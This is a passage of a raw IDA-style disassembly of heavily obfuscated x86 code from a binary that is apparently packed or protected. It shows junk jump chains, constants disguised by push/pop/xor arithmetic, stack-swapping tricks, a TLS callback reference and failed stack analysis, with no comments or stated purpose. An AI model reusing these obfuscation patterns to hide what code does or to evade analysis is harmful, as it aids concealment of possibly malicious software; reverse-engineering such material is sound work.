; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_428195: ; CODE XREF: sub_42C0BC-45AD�j
sub esi, ebx
shr ecx, 1Bh
xor edx, 0C9E81A11h
jmp loc_421A2E
; END OF FUNCTION CHUNK FOR sub_42C0BC
; =============== S U B R O U T I N E =======================================
sub_4281A5 proc near ; CODE XREF: _94j21ax3:0042245D�j
; sub_4224AD+3�p ...
; FUNCTION CHUNK AT 00421492 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00422556 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 00425527 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004269E5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427797 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00428B87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429339 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00429959 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A455 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A9A5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C3D1 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [eax]
or eax, eax
jz loc_42C0AC
jmp loc_429959
sub_4281A5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_4281B8: ; CODE XREF: sub_42B9CF:loc_426F30�j
jnz loc_42BA4F
jmp loc_42A45A
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
loc_4281C3: ; DATA XREF: sub_424B8F:loc_4281D4�o
mov eax, [ebp-0Ch]
mov ecx, 3FBh
xor edx, edx
div ecx
jmp loc_427F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B8F
loc_4281D4: ; CODE XREF: sub_424B8F:loc_4299DB�j
push offset loc_4281C3
jmp nullsub_81
; END OF FUNCTION CHUNK FOR sub_424B8F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_4281DE: ; CODE XREF: sub_42C057:loc_428D2E�j
jz loc_42AF16
jmp loc_425261
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jz loc_4234F1
jmp loc_426A13
; ---------------------------------------------------------------------------
loc_4281F8: ; CODE XREF: _94j21ax3:0042A7F1�j
sub esi, edi
jmp loc_42C175
; ---------------------------------------------------------------------------
loc_4281FF: ; CODE XREF: _94j21ax3:0042147B�j
jz loc_42751A
; =============== S U B R O U T I N E =======================================
sub_428205 proc near ; CODE XREF: sub_422866+40FD�p
; FUNCTION CHUNK AT 004286EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B461 SIZE 00000011 BYTES
mov [esp+0], edi
pop edi
mov eax, [eax]
jmp loc_4286EA
sub_428205 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_428210: ; CODE XREF: sub_42C24F:loc_423F3E�j
xchg ebp, [edx]
jmp loc_421EE4
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42270C
loc_428217: ; CODE XREF: sub_42270C+2F24�j
adc edi, esi
and ecx, 763DF963h
jmp loc_423148
; END OF FUNCTION CHUNK FOR sub_42270C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_428224: ; CODE XREF: sub_423FCD:loc_426ACD�j
add [esi], ecx
xor [esi], edx
mov eax, 80000003h
xor ebx, ebx
jmp loc_427921
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_428234: ; CODE XREF: sub_428BBD+3204�j
jns loc_42B45A
and edx, eax
cmp edx, 438F0E94h
jmp loc_4235EA
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42426B
loc_428247: ; CODE XREF: sub_42426B+6DBB�j
push 0
push edi
push 71F6B658h
pop edi
xor edi, 71F6B658h
xchg edi, [esp+1Ch+var_1C]
jmp loc_421924
; END OF FUNCTION CHUNK FOR sub_42426B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250F7
loc_42825F: ; CODE XREF: sub_4250F7+E�j
jmp loc_42B02B
; ---------------------------------------------------------------------------
loc_428264: ; CODE XREF: sub_4250F7-3992�j
jmp nullsub_137
; END OF FUNCTION CHUNK FOR sub_4250F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A57
loc_428269: ; CODE XREF: sub_424A57-B6E�j
mov ebx, [ecx]
jmp loc_429BA0
; END OF FUNCTION CHUNK FOR sub_424A57
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
cmp edx, esi
jmp loc_4296BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A268
loc_428278: ; CODE XREF: sub_42A268:loc_42435F�j
test edx, esi
jmp loc_423523
; END OF FUNCTION CHUNK FOR sub_42A268
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_42827F: ; CODE XREF: sub_4287BF+A�j
popf
xchg edx, [esp-4+arg_0]
jmp loc_42160C
; END OF FUNCTION CHUNK FOR sub_4287BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_428288: ; CODE XREF: sub_42C057:loc_421CDB�j
and esi, 0EAA56111h
call sub_429D9A
loc_428293: ; CODE XREF: _94j21ax3:0042A083�j
jmp loc_4240CF
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_428298: ; CODE XREF: sub_42A309+6�j
jz loc_42547E
jmp loc_423212
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A83
loc_4282A3: ; CODE XREF: sub_429A83:loc_42654C�j
jz loc_423041
jmp loc_42206B
; END OF FUNCTION CHUNK FOR sub_429A83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42875C
loc_4282AE: ; CODE XREF: sub_42875C:loc_42AEF5�j
jz loc_4230A8
jmp loc_42A553
; END OF FUNCTION CHUNK FOR sub_42875C
; ---------------------------------------------------------------------------
loc_4282B9: ; CODE XREF: _94j21ax3:loc_42B083�j
pop edx
and edx, 8F3C8810h
add edx, 752A26DEh
popf
xchg edx, [esp]
jmp sub_4247A2
; ---------------------------------------------------------------------------
loc_4282CF: ; CODE XREF: _94j21ax3:004299A0�j
or eax, eax
jnz loc_42BF16
call sub_42574E
call sub_421126
; START OF FUNCTION CHUNK FOR sub_421402
loc_4282E1: ; CODE XREF: sub_421402+6FF9�j
jmp loc_427FC4
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
loc_4282E6: ; CODE XREF: _94j21ax3:00427C11�j
jmp locret_42693C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422A20
loc_4282EB: ; CODE XREF: sub_422A20:loc_4274B1�j
jmp nullsub_55
; END OF FUNCTION CHUNK FOR sub_422A20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_223. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271A0
loc_4282F2: ; CODE XREF: sub_4271A0:loc_4271A6�j
jmp loc_42AEA5
; END OF FUNCTION CHUNK FOR sub_4271A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABB1
loc_4282F7: ; CODE XREF: sub_42ABB1:loc_428F87�j
xor edi, 9AD201D8h
xchg edi, [esp+0]
push eax
pushf
push 1AB621D1h
pop eax
xor eax, 1AB621C1h
call sub_425B77
loc_428313: ; CODE XREF: sub_42982D-7C05�j
jmp loc_42AA6D
; END OF FUNCTION CHUNK FOR sub_42ABB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FC8
loc_428318: ; CODE XREF: sub_422FC8:loc_4232E0�j
mov edx, ebx
pop ebx
mov eax, offset loc_42BB50
xchg eax, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_422FC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4266F6
loc_428324: ; CODE XREF: sub_4266F6+10�j
or eax, 83CAA7E3h
sub eax, 30680610h
add eax, 3CBA6D19h
mov eax, [eax]
or eax, eax
jnz loc_4280E0
call sub_426612
jmp loc_42C5C1
; END OF FUNCTION CHUNK FOR sub_4266F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_42834A: ; CODE XREF: sub_429862:loc_428FEC�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
mov edx, [ebp+arg_0]
mov [edx-10h], eax
inc [ebp+var_4]
mov eax, [ebp+arg_0]
call sub_42484C
loc_428361: ; CODE XREF: sub_42284F:loc_42435A�j
or ecx, 14823B26h
loc_428367: ; CODE XREF: _94j21ax3:loc_422EFE�j
jnb loc_423895
sbb edi, 7E2BF1ECh
xchg eax, [ebp+0]
jmp loc_426A34
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
loc_42837B: ; CODE XREF: _94j21ax3:004270FB�j
sbb ebp, 0D97F23DDh
; =============== S U B R O U T I N E =======================================
sub_428381 proc near ; CODE XREF: sub_42A7A6+A�p
; FUNCTION CHUNK AT 00425313 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004256F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A249 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BE4B SIZE 0000002B BYTES
mov [esp+0], edx
pop edx
inc ds:dword_42343C
jmp loc_42BE4B
sub_428381 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_428390: ; CODE XREF: sub_42B238-1D38�j
jno loc_424945
cmp edx, ebx
jmp loc_4227AC
; END OF FUNCTION CHUNK FOR sub_42B238
; ---------------------------------------------------------------------------
loc_42839D: ; CODE XREF: _94j21ax3:00423C94�j
jnz loc_427256
jmp loc_42B8BD
; ---------------------------------------------------------------------------
loc_4283A8: ; CODE XREF: _94j21ax3:00422CB6�j
push ebx
push 0A3364411h
pop ebx
and ebx, 7CE423FCh
jmp loc_42918C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428993
loc_4283BA: ; CODE XREF: sub_428993+10�j
jz loc_42A750
jmp loc_4268EB
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4283C5: ; CODE XREF: sub_423324+5A71�j
jl loc_427B42
xchg edx, eax
loc_4283CD: ; CODE XREF: sub_42A268:loc_42AAD0�j
push 0DCFD8C40h
pop eax
sub eax, 0EEE3932h
add eax, 9A18A70Bh
add eax, ebp
add eax, 97D8033Dh
jmp loc_427B91
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4283EC: ; CODE XREF: sub_421402:loc_42A59D�j
pop eax
and eax, 0F54CC717h
add eax, 0B02A4248h
add eax, ebp
jmp loc_4282E1
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AED
loc_428400: ; CODE XREF: sub_424AED+F�j
mov esp, ebp
xchg esi, [esp+0]
mov ebp, esi
pop esi
mov eax, ds:dword_42C1FC
push offset loc_424CB1
jmp loc_423007
; END OF FUNCTION CHUNK FOR sub_424AED
; =============== S U B R O U T I N E =======================================
sub_428418 proc near ; CODE XREF: sub_425983-1182�p
; _94j21ax3:0042AFCC�j
mov [esp+0], edi
pop edi
jz loc_42AC48
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_42AC48
mov edx, [ebx+ecx]
jmp loc_42AC38
sub_428418 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_212. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_428437: ; CODE XREF: sub_42454E+689E�j
jmp nullsub_133
; END OF FUNCTION CHUNK FOR sub_42454E
; =============== S U B R O U T I N E =======================================
sub_42843C proc near ; DATA XREF: sub_4228FF+50F6�o
pop ebp
retn
sub_42843C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42843E: ; CODE XREF: sub_42A7A6-1648�j
jmp loc_42709A
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426626
loc_428443: ; CODE XREF: sub_426626+29B6�j
jmp loc_42BC61
; END OF FUNCTION CHUNK FOR sub_426626
; ---------------------------------------------------------------------------
loc_428448: ; CODE XREF: _94j21ax3:00422BFA�j
; _94j21ax3:00423E45�j
mov eax, [ebp-4]
mov al, [eax]
mov [ebp-9], al
mov al, [ebp-0Ah]
call sub_428DA6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_193. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D03
loc_428459: ; CODE XREF: sub_427D03+D�j
jmp loc_42A0AF
; END OF FUNCTION CHUNK FOR sub_427D03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42845E: ; CODE XREF: sub_423F55-2916�j
jmp loc_42993B
; END OF FUNCTION CHUNK FOR sub_423F55
; =============== S U B R O U T I N E =======================================
sub_428463 proc near ; DATA XREF: sub_421656+96B9�o
call sub_428AE1
sub_428463 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_421656
loc_428468: ; CODE XREF: sub_421656+A�j
; sub_426F9E-4E1D�j
mov eax, ds:dword_426F74
mov [ebp-4], eax
mov eax, [ebp-4]
mov esp, ebp
jmp loc_428ADA
; END OF FUNCTION CHUNK FOR sub_421656
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42847A: ; CODE XREF: sub_4294B3-6A2B�j
jl loc_42790B
sbb ebx, 6F544A27h
jmp loc_428881
; END OF FUNCTION CHUNK FOR sub_4294B3
; =============== S U B R O U T I N E =======================================
sub_42848B proc near ; CODE XREF: sub_424B01+5�p
; FUNCTION CHUNK AT 00421288 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042782B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004295C5 SIZE 00000019 BYTES
mov [esp+0], eax
xchg ecx, eax
mov esp, ebp
pop ebp
jmp loc_4295C5
sub_42848B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_428498: ; CODE XREF: sub_42484C:loc_428752�j
sub ecx, 725B8952h
add ecx, 0BEDDC61h
mov ecx, [ecx]
push offset sub_4220FC
jmp sub_426A43
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
loc_4284B0: ; CODE XREF: _94j21ax3:0042C4C2�j
jle loc_42704D
loc_4284B6: ; CODE XREF: _94j21ax3:loc_427408�j
push offset sub_42B43F
jmp locret_42C507
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4284C0 proc near ; DATA XREF: sub_42651A+6�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421000 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004211CE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042BA70 SIZE 00000009 BYTES
push ebp
mov ebp, esp
mov esp, ebp
pop ebp
mov eax, ds:dword_42C498
jmp loc_4211CE
sub_4284C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4284D1: ; CODE XREF: sub_421402+7BBD�j
add ebp, eax
and edx, eax
loc_4284D5: ; CODE XREF: sub_421402:loc_4229C6�j
push offset sub_424B54
loc_4284DA: ; CODE XREF: _94j21ax3:004277DD�j
jmp nullsub_165
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
loc_4284DF: ; CODE XREF: _94j21ax3:0042287D�j
not ebp
or edi, 0F9C3AFA0h
adc ecx, 648C1F53h
loc_4284ED: ; CODE XREF: _94j21ax3:loc_428588�j
push 1388h
call sub_42651A
push 0
call sub_429BE2
locret_4284FE: ; CODE XREF: _94j21ax3:00428A34�j
retn
; ---------------------------------------------------------------------------
call sub_426809
; START OF FUNCTION CHUNK FOR sub_428954
loc_428504: ; CODE XREF: sub_428954+562�j
jmp loc_4273F0
; END OF FUNCTION CHUNK FOR sub_428954
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_428509: ; CODE XREF: sub_42A7A6-36FD�j
jmp sub_4265C2
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42850E: ; CODE XREF: sub_4294B3-3C71�j
shr ebp, 18h
cmp esi, 0F6EE72BDh
jmp loc_424A18
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
loc_42851C: ; CODE XREF: _94j21ax3:0042888E�j
mov [eax], edx
; =============== S U B R O U T I N E =======================================
sub_42851E proc near ; CODE XREF: sub_428BBD+12�p
; FUNCTION CHUNK AT 00422E09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423486 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042433F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429E83 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B5BC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B82F SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
add eax, edx
pop edx
mov esi, [eax]
add eax, 4
call sub_426744
loc_42852F: ; CODE XREF: sub_421BF6+15�j
jmp loc_423486
sub_42851E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_428534: ; CODE XREF: sub_421D33+6CDB�j
xor esi, 3A4EBE90h
add esi, ebp
add esi, 7BC2FE89h
call sub_42C2E2
loc_428547: ; CODE XREF: sub_429C27+D�j
jmp loc_42C29F
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
mov ebx, edx
jmp sub_426AFD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_428553: ; CODE XREF: sub_422EB0+8373�j
sbb ecx, edx
loc_428555: ; CODE XREF: sub_422EB0:loc_4292F8�j
xor eax, eax
mov [ebp-0Ch], eax
lea eax, [ebp-70h]
call sub_423FE1
; END OF FUNCTION CHUNK FOR sub_422EB0
; START OF FUNCTION CHUNK FOR sub_429629
loc_428562: ; CODE XREF: sub_429629-587�j
jz loc_426AE0
jmp loc_428B24
; END OF FUNCTION CHUNK FOR sub_429629
; ---------------------------------------------------------------------------
push offset loc_4244D6
jmp loc_421FBF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_428577: ; CODE XREF: sub_42C0BC:loc_427548�j
pop edi
add edi, 5E7221FFh
push offset sub_4224AD
jmp loc_42A384
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
loc_428588: ; CODE XREF: _94j21ax3:loc_42935B�j
jnz loc_4284ED
jmp loc_422877
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4257BC
loc_428593: ; CODE XREF: sub_4257BC:loc_423A2E�j
push offset loc_421518
jmp nullsub_57
; END OF FUNCTION CHUNK FOR sub_4257BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42859D: ; CODE XREF: sub_42A0CC+160E�j
mov edi, 6C1A5CF4h
adc ebx, 2681A882h
xchg ecx, [edi]
loc_4285AA: ; CODE XREF: sub_42A0CC:loc_424A6E�j
push 4D599C3Dh
pop eax
push offset loc_427C79
jmp loc_42239B
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_4285BA: ; CODE XREF: sub_421F28:loc_4217AD�j
; _94j21ax3:0042BF48�j
push eax
call sub_42BFF0
push ecx
push 0A251EE61h
pop ecx
and ecx, 0F48B38E3h
xor ecx, 0BD35A048h
jmp loc_424BB9
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
loc_4285D8: ; CODE XREF: _94j21ax3:00424E76�j
cdq
shl edx, 11h
loc_4285DC: ; CODE XREF: _94j21ax3:loc_424E59�j
push offset sub_42A117
jmp locret_4259A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_4285E6: ; CODE XREF: sub_422973:loc_425215�j
xchg ebp, [eax]
jmp loc_42882E
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_4285ED: ; CODE XREF: sub_42AA5F:loc_426D62�j
not ecx
and edx, 846948DFh
jz loc_4240D4
jmp loc_42BFCA
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A56
loc_428600: ; CODE XREF: sub_423A56+1E00�j
jnz loc_42B954
jmp loc_429788
; END OF FUNCTION CHUNK FOR sub_423A56
; ---------------------------------------------------------------------------
loc_42860B: ; CODE XREF: _94j21ax3:0042744B�j
add eax, 28h
push ecx
push 0ED0EB7F4h
pop ecx
jmp loc_421EBD
; ---------------------------------------------------------------------------
loc_42861A: ; CODE XREF: _94j21ax3:00425405�j
jnp loc_424F5D
; =============== S U B R O U T I N E =======================================
sub_428620 proc near ; CODE XREF: sub_42472B+1�p
; sub_422EB0:loc_425610�j
; FUNCTION CHUNK AT 00422002 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042211B SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
push edi
push 0FE524C59h
pop edi
rol edi, 0Fh
jmp loc_42211B
sub_428620 endp
; ---------------------------------------------------------------------------
add edx, ebp
mov [ebx], edi
jmp sub_4257BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FC8
loc_42863C: ; CODE XREF: sub_422FC8:loc_422FD7�j
and ecx, eax
sub ebx, edx
xchg ebx, [esp+0]
or edx, esi
jmp loc_4232E0
; END OF FUNCTION CHUNK FOR sub_422FC8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_180. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422790
loc_42864B: ; CODE XREF: sub_422790:loc_428FE2�j
call sub_42BB8A
loc_428650: ; CODE XREF: sub_424FE0+E�j
pop edx
and edx, 22EE93D2h
or edx, 0C5E6355Fh
xor edx, 6D9AEDA7h
add edx, ebp
jmp loc_426C3D
; END OF FUNCTION CHUNK FOR sub_422790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_42866A: ; CODE XREF: sub_4259BF-4152�j
test eax, eax
jl loc_424949
jmp loc_422773
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_428677: ; CODE XREF: sub_42972F:loc_42660D�j
pop edx
or edx, 0B9E2F08Ch
and edx, 0E194D98Eh
add edx, 5EBD97F1h
xchg edx, [esp+0]
jmp sub_42A8BB
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
loc_428692: ; CODE XREF: _94j21ax3:00429424�j
and edx, ebx
; =============== S U B R O U T I N E =======================================
sub_428694 proc near ; CODE XREF: sub_429629+D�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00426C61 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00427F9D SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
mov [esp+0], eax
jmp loc_426C61
sub_428694 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_4286A0: ; CODE XREF: sub_42AA5F:loc_421542�j
sub ecx, 0EE70DA31h
push eax
jmp loc_429B29
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAD4
loc_4286AC: ; CODE XREF: sub_42BAD4-5FA0�j
jbe loc_427895
loc_4286B2: ; CODE XREF: _94j21ax3:loc_428F05�j
push offset sub_42A2B1
jmp nullsub_171
; END OF FUNCTION CHUNK FOR sub_42BAD4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEDC
loc_4286BC: ; CODE XREF: sub_42BEDC-6487�j
push offset sub_429B19
jmp loc_421370
; END OF FUNCTION CHUNK FOR sub_42BEDC
; ---------------------------------------------------------------------------
test esi, 812ECE20h
jmp loc_42596F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_4286D1: ; CODE XREF: sub_424C37+C�j
jnz loc_429B6C
jmp loc_4217A8
; END OF FUNCTION CHUNK FOR sub_424C37
; =============== S U B R O U T I N E =======================================
sub_4286DC proc near ; DATA XREF: _94j21ax3:004297AF�o
xchg edx, [esp+0]
jmp loc_427833
sub_4286DC endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_4286E5: ; CODE XREF: sub_423FCD+83E0�j
jmp loc_42873F
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428205
loc_4286EA: ; CODE XREF: sub_428205+6�j
jmp loc_42B461
; END OF FUNCTION CHUNK FOR sub_428205
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A254
loc_4286EF: ; CODE XREF: sub_42A254+1B5F�j
add ecx, 0CFFF8402h
xchg ecx, [esp+0]
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_42A254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_4286FD: ; CODE XREF: sub_423BF8+444B�j
rol eax, 10h
push 50D53E33h
mov [esp+0], eax
retn
; END OF FUNCTION CHUNK FOR sub_423BF8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428709 proc near ; CODE XREF: sub_427CEA:loc_422F29�j
push ebp
mov ebp, esp
call sub_423324
locret_428711: ; CODE XREF: _94j21ax3:0042450D�j
retn
sub_428709 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_428712: ; CODE XREF: _94j21ax3:00427693�j
jmp loc_4246DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429974
loc_428717: ; CODE XREF: sub_429974-7988�j
rol eax, 0Eh
push eax
push edi
push 4D7CDF1Dh
pop edi
add edi, 0B2C533FDh
xchg edi, [esp+4+var_4]
jmp loc_423E1B
; END OF FUNCTION CHUNK FOR sub_429974
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42922A
loc_428730: ; CODE XREF: sub_42922A+C�j
mov eax, [eax]
popf
push eax
push ecx
push offset loc_4253D7
jmp loc_4257EE
; END OF FUNCTION CHUNK FOR sub_42922A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42873F: ; CODE XREF: sub_423FCD:loc_4286E5�j
push edx
call sub_42B478
loc_428745: ; CODE XREF: TlsCallback_0-846D�j
jmp loc_42659C
; END OF FUNCTION CHUNK FOR sub_423FCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_164. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42874B proc near ; DATA XREF: sub_429BE2-583B�o
push ds:dword_425BD0
retn
sub_42874B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_428752: ; CODE XREF: sub_42484C+7794�j
jmp loc_428498
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42269A
loc_428757: ; CODE XREF: sub_42269A+1F88�j
jmp loc_42B0B8
; END OF FUNCTION CHUNK FOR sub_42269A
; =============== S U B R O U T I N E =======================================
sub_42875C proc near ; CODE XREF: _94j21ax3:00429F54�p
; sub_42AC17:loc_42AC28�j
; FUNCTION CHUNK AT 004282AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AEF5 SIZE 00000005 BYTES
mov eax, ds:dword_42343C
or eax, eax
jnz loc_42AB50
jmp loc_42AEF5
sub_42875C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A9F
loc_42876F: ; CODE XREF: sub_426A9F-105A�j
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
loc_428777: ; CODE XREF: sub_422C48:loc_424523�j
jmp loc_422AFC
